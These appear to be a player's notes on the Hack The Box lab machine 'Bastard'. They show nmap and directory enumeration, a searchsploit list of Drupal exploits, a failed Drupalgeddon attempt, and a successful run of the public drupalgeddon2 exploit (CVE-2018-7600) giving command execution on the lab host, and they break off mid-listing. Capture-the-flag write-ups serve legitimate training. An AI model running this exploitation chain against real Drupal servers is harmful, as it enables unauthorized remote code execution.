Bastard # ENUMERATION NMAP: - 80: Microsoft IIS httpd 7.5 - 135: Microsoft Windows RPC - 49154: Microsoft Windows RPC - Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ============================================ # ENUMERATION # DRUPAL 7 INSTALLATION ON PORT 80 # FINDING - Sorry, unrecognized username or password. Have you forgotten your password? - After a login attempt with defaut creds, this verifies the account doesn't exist. ============================================ # ENUMERATION # SEARCHSPLOIT kali@kali:~/HTB/RETIRED/Bastard$ searchsploit drupal 7 -------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------- --------------------------------- Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execu | php/webapps/44449.rb Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execu | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Met | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Met | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Sc | php/webapps/25493.txt Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flots | php/webapps/35072.txt Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb -------------------------------------------------------------------------------- --------------------------------- - Not interested in the ones before version 7 ============================================ # ENUMERATION # DIRB - nothing of note... - EDIT: found directory called /rest + http://10.10.10.9/rest (CODE:200|SIZE:62) - this will be used later... ============================================ # EXPLOIT # CVE 2014-3704 - Ran script from https://www.exploit-db.com/exploits/34992 - [X] NOT Vulnerable :( ============================================ # EXPLOIT # CVE 2018-7600 - https://github.com/dreadlocked/Drupalgeddon2/blob/master/README.md kali@kali:~/HTB/RETIRED/Bastard/Drupalgeddon2$ ./drupalgeddon2.rb http://10.10.10.9/drupal-7/ [*] --==[::#Drupalggedon2::]==-- -------------------------------------------------------------------------------- [i] Target : http://10.10.10.9/drupal-7/ -------------------------------------------------------------------------------- [redacted] [-] Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE ============================================ # EXPLOIT # CVE 2018-7600 - https://github.com/dreadlocked/Drupalgeddon2/blob/master/README.md - This is the same exploit as above, just run the command without the drupal directory kali@kali:~/HTB/RETIRED/Bastard/Drupalgeddon2$ ./drupalgeddon2.rb http://10.10.10.9/ [*] --==[::#Drupalggedon2::]==-- -------------------------------------------------------------------------------- [i] Target : http://10.10.10.9/ -------------------------------------------------------------------------------- [redacted] -------------------------------------------------------------------------------- [*] Testing: Code Execution (Method: name) [i] Payload: echo XUGDXOLL [+] Result : XUGDXOLL [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! -------------------------------------------------------------------------------- [redacted] -------------------------------------------------------------------------------- [*] Dropping back to direct OS commands drupalgeddon2>> dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA Directory of C:\inetpub\drupal-7.54 19/03/2017 09:04 ��